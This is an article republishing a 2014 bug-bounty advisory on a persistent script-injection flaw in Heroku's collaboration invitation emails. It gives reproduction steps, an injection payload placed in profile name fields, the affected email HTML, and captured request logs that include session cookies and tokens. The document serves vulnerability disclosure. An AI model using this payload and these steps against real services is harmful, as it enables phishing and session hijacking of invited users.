Heroku Bug Bounty Program 2015 - Persistent Invitation Vulnerability

Editorial_Staff_Team's picture

Heroku Bug Bounty Program 2015 - Persistent Invitation Vulnerability & Video

Vulnerability researchers of the evolution security gmbh team discovered two application-side vulnerabilities in the official heroku api and online-service web application. The issue has been discovered to the official bug bounty program of heroku in 2014Q4.

During the last week the updates has been confirmed by officials of the company after the famous bug bounty hunter disclosed a video that demonstrates the issue to the developer team. The second issue has the same impact with another location (deep dive). We only insert the link at the buttom that becomes available in some hours.

The heroku dashboard impact a vulnerability inside of the invite module. After the registration with a script code payload as first- &lastname. The heroku online-service responds without secure encoded name value inside of the invitation mailing. The attacker went after the registration to the following webpage (https://dashboard.heroku.com/apps/asdsad/access) and is able to include any email to stream inside of the invitation to collaborate request own malicious script codes. The request method to inject the code by registration inside of the app service is POST. The exploitation takes place after the local attacker included another remote email to stream unauthorized malicious persistent context in outgoing emails of the heroku online-service through an invitation to collaborate.

In the main emails of the registration the context of the database has been parsed in outgoing mail. The heroku dashboard access service does not encode the database context on invitations to collaborate context which results in the successful exploitation of the application-side issue. The bug typus has been declared as persistent mail encoding web vulnerability in the heroku webserver service in connection with the vulnerable application module/function. The sender email is the main heroku reply address. The bug execution occurs in the api validation of the form that allows to contact via invite other email contacts. In the Dashboard beta of heroku is the same bug in the same module/function available because only the frontend has been changed during the update. 

The security risk of the persistent mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1. Exploitation of the persistent vulnerability in the `invitation to collaborate` module requires a low privileged heroku account with low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external source and persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Heroku Dashboard > Apps > User[x] > Access
[+] Heroku Dashboard Beta > Apps > User[x] > Access

Vulnerable Function(s):
[+] Invitation to Collaborate
[+] Invitation

Affected Module(s):
[+] API

Proof of Concept (PoC):
The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...

1. Register an account with a script code payload in the first- & last-name input fields
2. Save the context and access the account
3. Register a new random app inside of the dasboard
4. Switch to the apps > access section in the regular dasboard or via beta template
5. Add any random email or heroku user account mail to the access rules and save the context
Note: A notification mail arrives at the new registered access user inbox
6. The payload executes ahead to the mail mail body context because of the registered payload inside of the user profile values
7. Successful reproduce of the persistent web vulnerability!

PoC: Mail Header > Source

----==_mimepart_53fe30f6c9dbf_79c5a2a6ac74767
Content-Type: text/plain;
charset=UTF-8
Content-Transfer-Encoding: 7bit

"><img src="x">%20%20>"<iframe src=a>%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO COLLABORATE HERE!!!] (admin@evolution-sec.com) has invited you to collaborate on their app "asdsad" on Heroku:http://asdsad.herokuapp.com/
Since you already have an account with Heroku, you can get started by simply git cloning the app repository:

PoC: Invite to Collaborate (noreply@heroku.com)

<td style="vertical-align: top; text-align: left; padding: 0;" align="left" valign="top">
<h1 id="logo" style="color: #6E5BAA; display: block; font-family: hybrea, proxima-nova, 'helvetica neue', helvetica,
arial, geneva, sans-serif; font-size: 32px; font-weight: 200; text-align: left; margin: 0 0 40px;" align="left">
<img src="http://heroku.newsletter.s3.amazonaws.com/hk-logo.png" alt="heroku" style="outline: none; text-decoration: none; border: 0;" height="42" width="120"></h1>

<p style="margin: 20px 0;">"><img src="x">%20%20>"<iframe src="a">%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO COLLABORATE HERE!!!] (admin@evolution-sec.com) has
invited you to collaborate on their app "<a href="http://asdsad.herokuapp.com/" style="color: #6E5BAA;">asdsad</a>" on Heroku.</p>
<p style="margin: 20px 0;">Since you already have an account with Heroku, you can get started by simply git cloning the app repository:</p>
<blockquote style="border-radius: 5px; font-family: courier, monospace; background: #ebeaef; margin: 10px 0; border: 10px solid #ebeaef;">
  <span class="shell" style="color: #6E5BAA;">$</span> git clone git@heroku.com:asdsad.git -o heroku
</blockquote>
<p style="margin: 20px 0;">See <a href="http://devcenter.heroku.com/articles/collab" style="color: #6E5BAA;">our quickstart guide</a> for additional information</p>
                        <p style="margin: 20px 0;">
                          The Heroku Team<br />
                          <a href="https://heroku.com" style="color: #6E5BAA;">https://heroku.com</a>
                        </p>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
              <tr style="vertical-align: top; padding: 0;">
                <td class="templateContainerPadding" align="center" valign="top" style="vertical-align: top; padding: 0 40px;">
                  <table id="footerContent" style="border-spacing: 0; border-collapse: collapse; font-family: proxima-nova, 'helvetica neue',
helvetica, arial, geneva, sans-serif; height: 100%; width: 100%; border-top-style: solid; border-top-color: #ebeaef; color: #999999; font-size: 12px;
background: #ffffff; margin: 0; padding: 0; border-width: 1px 0 0;">
                    <tr style="vertical-align: top; padding: 0;">
                      <td valign="top" style="vertical-align: top; text-align: left; padding: 0;" align="left">
                        <p style="margin: 20px 0;">
                          Heroku is the cloud platform for rapid deployment and scaling of web applications. Get up and running in minutes, then deploy instantly via Git.
                        </p>
                        <p style="margin: 20px 0;">
                          To learn more about Heroku and all its features, check out the Dev Center: <a href="https://devcenter.heroku.com/articles/quickstart"
style="color: #666666;">https://devcenter.heroku.com/articles/quickstart</a>
                        </p>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </center>

<style type="text/css">
... ... ... ...
  }
}
</style>
</body>
</html>
</body>
</html>
</iframe></p></td>

--- Poc Session Logs [POST] [Invite to Collaborate] (Notification API) ---
21:26:26.784[414ms][total 414ms] Status: 302[Found]
POST https://dashboard.heroku.com/apps/asdsad/access

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host

[dashboard.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]

    Accept-Encoding[gzip, deflate]
      Referer[https://dashboard.heroku.com/apps/asdsad/access]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; 

__utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C

%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D;
mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles
%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-
heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5Nj
MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--
19be2343ca827f40ab20fc07e7093201c381af2c;
user_session_secret=BAhJIgKiBUx6Rm... ... ... JiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c;
dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
_ga=GA1.3.1421671373.1409166519; 

__utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509;
__utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; 

visitor_id36622=271240760; flash=%7B%7D]
      Connection[keep-alive]
   POST-Daten:
      utf8[%E2%9C%93]
      authenticity_token[UJ2cNuaCS17OgLRzaV3k%2FecCQAvZgQHgLkGivdqipug%3D]

      user%5Bemail%5D[bkm%40evolution-sec.com]
      commit

[Invite]
   Response Header:
      Cache-Control[no-cache, no-store, must-revalidate]
      Content-Type[text/html; charset=utf-8]
      Date[Wed, 27 Aug 2014 19:26:46 GMT]
      Expires[0]
      Location

[https://dashboard.heroku.com/apps/asdsad/access]
      Pragma[no-cache]
      Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9]
      Server[nginx/1.5.7]
      Set-Cookie[flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D; domain=dashboard.heroku.com; path=/; secure]
      status[302 Found]
      Strict-Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-Rack-Cache[invalidate, pass]
      X-Request-Id

[63991fba-fbb1-492d-8b22-866fa6111cb9]
      x-runtime[0.230753]
      x-ua-compatible[IE=Edge,chrome=1]
      Transfer-Encoding[chunked]
      Connection[keep-alive]

21:26:27.201[474ms][total 1293ms] Status: 200[OK]
GET https://dashboard.heroku.com/apps/asdsad/access Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[13369] Mime Type[text/html]
   Request 

Header:
      Host[dashboard.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-

US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dashboard.heroku.com/apps/asdsad/access]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; 

__utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C
%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; 

mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles
%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-
heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5Nj
MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--
SldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c;
dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
_ga=GA1.3.1421671373.1409166519; 

__utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509;
__utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; 

visitor_id36622=271240760; flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D]
      Connection[keep-alive]
   Response Header:
      Cache-Control[must-revalidate, no-cache, no-store, private]

Content-Type[text/html; charset=utf-8]
      Date[Wed, 27 Aug 2014 19:26:47 GMT]
      Expires[0]
      Pragma[no-cache]
      Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
      Server[nginx/1.5.7]
      status[200 OK]
      Strict-

Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-Rack-Cache[miss]
      X-Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
      x-runtime[0.287221]
      x-ua-compatible[IE=Edge,chrome=1]
      Content-Length

[13369]
Connection[keep-alive]

 

PoC: Invite via Dashboard Beta through Heroku API

<td style="vertical-align: top; text-align: left; padding: 0;" align="left" valign="top">
                        <h1 id="logo" style="color: #6E5BAA; display: block; font-family: hybrea, proxima-nova, 'helvetica neue',
helvetica, arial, geneva, sans-serif; font-size: 32px; font-weight: 200; text-align: left; margin: 0 0 40px;"
align="left"><img src="http://heroku.newsletter.s3.amazonaws.com/hk-logo.png" alt="heroku" style="outline: none; text-decoration: none;
border: 0;" height="42" width="120"></h1><p style="margin:

20px 0;">"><img src="x">%20%20>"<iframe src="a">%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO HEROKU HERE!!!] (admin@evolution-sec.com) has
invited you to collaborate on their app "<a href="http://asdsad.herokuapp.com/" style="color: #6E5BAA;">asdsad</a>" on Heroku.</p>

<p style="margin: 20px 0;">Follow this link to get access:</p>

<p style="margin: 20px 0;"><a href="https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab...
style="color: #6E5BAA;">https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab...

<p style="margin: 20px 0;">Heroku is a cloud application platform – a new way of building and deploying web apps. Develop your app using your local tools,
then deploy via Git. After accepting the invitation, check out <a href="http://devcenter.heroku.com/articles/quickstart" style="color: #6E5BAA;">our quickstart guide</a></p>
<p style="margin: 20px 0;">To learn more about deploying apps on Heroku, <a href="http://devcenter.heroku.com" style="color: #6E5BAA;">check out the docs.</a></p>
<p style="margin: 20px 0;">Have fun, and don't hesitate to contact us with your feedback.</p>
                        <p style="margin: 20px 0;">
                          The Heroku Team<br />
                          <a href="https://heroku.com" style="color: #6E5BAA;">https://heroku.com</a>
                        </p>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </center>

--- PoC Session Logs (Invite to Heroku via Beta Theme) [POST] (Notification API) ---

22:25:24.964[743ms][total 743ms] Status: 201[Created]
POST https://dashboard-next.heroku.com/api/apps/2737d28a-9acd-4352-a3d4-b3efb...

Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[211] Mime Type

[application/json]
   Request Header:

      Host[dashboard-next.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[application/vnd.heroku+json; version=3]
      Accept-

Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/json; charset=UTF-8]
      X-CSRF-Token[IKbYx6U4o8Drv7vgoT9gX45Jegk+XVigarkg4=]
      X-Requested-With[XMLHttpRequest]
      Referer

[https://dashboard-next.heroku.com/apps/asdsad/access]
      Content-Length[41]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409170245.2; __utmb=148535982.36.10.1409170245;
__utmc=148535982; __utmz=148535982.1409170245.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false
%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B
%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22%3A
%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
session=Zy3Pusin4kPPd6OSt9FhcA.neINSzdfS2R5CjblMoRCYUntFqVvMiYai26fqEvBjFzjfKLFCGPDOq_6gCE32OQk9SO974NplMf13oRR7W1wUpYefJ_4kYO72VsPtkRKlt1fJ_bbA13yUvVYIHHRwEvtWN_qjk7ZL-
Z09sewhk5I_YCfIEubvb4wNXAETzdbWwxLKNAf1HZQ5qkpKC4vXKpSrXIzkx1Zp1xvKuDFxayYaNA3F47iY7i-0mIdcC4qtP20EoaXPANL5YVoUdftj9LuFxMHqeolBDglB4wPTBoJO6rRYhXvF-S6D7VCQVUXUDpfHnw-
SizaiacWTAst7KBGtvMb5kUomoPk_7RqJhbWtd7l7opjWQoFdvGBlWCRCyuYQPVoEnT8RCH_cq5nkwKHMVBKFYSKTuBVDL9n6wxgkh8lofNVtL01sbCunT92Cg8QRvqLKuSfv2uPdFP0ZGDOBbxCAafFRz_7lppQ8TfA-
Dnd00DMZZoIN-Pjd84Mntn2Ev7voqqrTjMr85hLCaX48ZLlViIwIHGkyT6fn39hVBvJdWsKpYnOQx8JbbRAcXG9-z1ogW9iRO-8SvvX7OVDzujbA9mvdL2YgJ-M7loe5dNFKbPfxtJ_bVeVbfqN5rhkjn6a2-0EelwwrmT
8zaGwyCfLj6Dre30FaMRo_spHe_3WQqpmGdtccgHHVfv_fTFUwtmIPVGPV9lBNI-HdOhfTXe5vNwdMa4O_Zc8h3LJXY_SioLjT2rJpny5jyTpOmnGiKg7_5gBRrVho6a0X62v.1409166935525.86400000.SB-
x_q66Gn0thFKWXzZnGtWq4xqLkWMrXX-s6OPg4yU; __utma=155690030.1421671373.1409166519.1409166929.1409170304.2; __utmc=155690030;
__utmz=155690030.1409170304.2.2.utmcsr=dashboard.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/asdsad/access;
ref=lUfOxJR7MTq-HJ0g1YRMbgJitTUh-GL28r4373os2BeJj-FIGe2wFX7CZkOr-
wrZ6tI3U09rIeKWnfQ2P0aBX2MTYoqdRAdCNgAhXXBmKMuquCTPzqlPdhEPxdpdF70J%7CwCAYZcZQpXb_iEF_o-HTSQ%3D%3D%7Ce7cb9d999af74418ae28fb1d3b50be583ed9c91ef71f71aa6080f662f8e0a0f7;
__utmb=155690030.29.10.1409170304]
Connection[keep-alive]

Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:

      {"user":"research@vulnerability-lab.com"}[]
   Response Header:
      Cache-Control[no-cache]
      Content-Type[application/json;charset=utf-8]
      Date[Wed, 27 Aug 2014 

20:25:45 GMT]
      Oauth-Scope[global]
      Oauth-Scope-Accepted[global write-protected]
      Ratelimit-Remaining[2399]
      Request-Id[fb852b2b-8596-4199-8093-4bf2f5c8c0a2]
      Server[nginx/1.4.7]
      status[201 Created]

Strict-Transport-Security[max-age=15768000]
      Vary[Accept-Encoding]
      x-content-type-options[nosniff]
      X-Download-Options[noopen]
      X-Frame-Options[DENY]
      x-runtime[0.468937]
      X-XSS-Protection[1; mode=block]

Content-Length[211]
      Connection[keep-alive]

22:25:26.908[216ms][total 216ms] Status: 200[OK]
GET https://dashboard-next.heroku.com/alpha-api/notifications

Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[2] Mime Type[application/json]
   Request Header:
      Host[dashboard-

next.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[application/vnd.heroku+json; version=3]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, 

deflate]
      Content-Type[application/json]
      X-CSRF-Token[IKbYx6U4o8Drv7vgoT9gX45Jegk+XVigarkg4=]
      X-Requested-With[XMLHttpRequest]
      Referer[https://dashboard-next.heroku.com/apps/asdsad/access]
      Cookie

[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409170245.2; __utmb=148535982.36.10.1409170245;
__utmc=148535982; __utmz=148535982.1409170245.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|
utmctr=(not%20provided); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22
false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false
%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id
%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-
062d1b005a52%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22
devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-
4f65-82b4-19994d4222d3; session=Zy3Pusin4kPPd6OSt9FhcA.neINSzdfS2R5CjblMoRCYUntFqVvMiYai26fqEvBjFzjfKLFCGPDOq_6gCE32OQk9SO974NplMf13oRR7W1wUpYefJ_
4kYO72VsPtkRKlt1fJ_bbA13yUvVYIHHRwEvtWN_qjk7ZL-
Z09sewhk5I_YCfIEubvb4wNXAETzdbWwxLKNAf1HZQ5qkpKC4vXKpSrXIzkx1Zp1xvKuDFxayYaNA3F47iY7i-0mIdcC4qtP20EoaXPANL5YVoUdftj9LuFxMHqeolBDglB4wPTBoJO6rRYhXvF-
S6D7VCQVUXUDpfHnw-
SizaiacWTAst7KBGtvMb5kUomoPk_7RqJhbWtd7l7opjWQoFdvGBlWCRCyuYQPVoEnT8RCH_cq5nkwKHMVBKFYSKTuBVDL9n6wxgkh8lofNVtL01sbCunT92Cg8QRvqLKuSfv2uPdFP0ZGDOBbxCAafFRz_
7lppQ8TfA-Dnd00DMZZoIN-
Pjd84Mntn2Ev7voqqrTjMr85hLCaX48ZLlViIwIHGkyT6fn39hVBvJdWsKpYnOQx8JbbRAcXG9-z1ogW9iRO-8SvvX7OVDzujbA9mvdL2YgJ-M7loe5dNFKbPfxtJ_bVeVbfqN5rhkjn6a2-0EelwwrmT8za
GwyCfLj6Dre30FaMRo_spHe_3WQqpmGdtccgHHVfv_fTFUwtmIPVGPV9lBNI-
HdOhfTXe5vNwdMa4O_Zc8h3LJXY_SioLjT2rJpny5jyTpOmnGiKg7_5gBRrVho6a0X62v.1409166935525.86400000.SB-x_q66Gn0thFKWXzZnGtWq4xqLkWMrXX-s6OPg4yU;
__utma=155690030.1421671373.1409166519.1409166929.1409170304.2; __utmc=155690030;
__utmz=155690030.1409170304.2.2.utmcsr=dashboard.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/asdsad/access;
ref=lUfOxJR7MTq-HJ0g1YRMbgJitTUh-GL28r4373os2BeJj-FIGe2wFX7CZkOr-

wrZ6tI3U09rIeKWnfQ2P0aBX2MTYoqdRAdCNgAhXXBmKMuquCTPzqlPdhEPxdpdF70J%7CwCAYZcZQpXb_iEF_o-HTSQ%3D%3D%7Ce7cb9d999af74418ae28fb1d3b50be583ed9c91ef71f71aa6080f662f8e0a0f7;
__utmb=155690030.29.10.1409170304]
      Connection[keep-alive]

Response Header:
      Cache-Control[no-store, no-cache]
      Content-Type[application/json]
      Date[Wed, 27 Aug 2014 20:25:46 GMT]
      Etag["223132457"]
      Strict-Transport-Security[max-age=15768000]
      x-content-type-options

[nosniff]
      X-Download-Options[noopen]
      X-Frame-Options[DENY]
      X-XSS-Protection[1; mode=block]
      Content-Length[2]
      Connection[keep-alive]

Reference(s):
https://dashboard.heroku.com
https://devcenter.heroku.com
https://dashboard-next.heroku.com/api/apps/2737d28a-9acd-4352-a3d4-b3efb...
https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab...
https://dashboard.heroku.com/apps/asdsad/access
https://dashboard-next.heroku.com/alpha-api/notifications
https://dashboard-next.heroku.com/alpha-api
https://dashboard-next.heroku.com/

[VIDEO] Heroku API Bug Bounty Program 2014/2015 - Persistent Mail Encoding Vulnerability (Application-Side)

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1300

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1398

Rate this article: 
Average: 5 (4 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.